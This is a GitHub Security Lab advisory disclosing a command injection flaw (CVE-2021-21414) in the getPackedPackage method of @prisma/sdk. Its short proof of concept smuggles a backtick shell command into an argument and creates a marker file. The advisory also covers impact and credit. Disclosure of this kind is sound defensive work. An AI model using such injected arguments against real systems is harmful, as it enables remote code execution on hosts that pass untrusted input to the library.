skip to content
Back to GitHub.com
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
April 13, 2021

GHSL-2021-060: Command injection in @prisma/sdk - CVE-2021-21414

Alvaro Munoz

Coordinated Disclosure Timeline

Summary

The getPackedPackage method has a command injection vulnerability. Clients of the @prisma/sdk library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.

Product

@prisma/sdk

Tested Version

Latest commit at the time of reporting (March 25, 2021).

Details

Command injection in getPackedPackage

The following proof-of-concept illustrates the vulnerability. First install @prisma/sdk:

npm install @prisma/sdk

Now create a file with the following contents:

const sdk = require("@prisma/sdk");
sdk.getPackedPackage("foo", "bar", "foo`touch /tmp/exploit`")

and run it:

node test.js

Notice that a file named exploit has been created.

This vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples: CVE-2020-7646, CVE-2020-7614, CVE-2020-7597, CVE-2019-10778, CVE-2019-10776, CVE-2018-16462, CVE-2018-16461, CVE-2018-16460, CVE-2018-13797, CVE-2018-3786, CVE-2018-3772, CVE-2018-3746, CVE-2017-16100, CVE-2017-16042.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

CVE

Credit

This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-060 in any communication regarding this issue.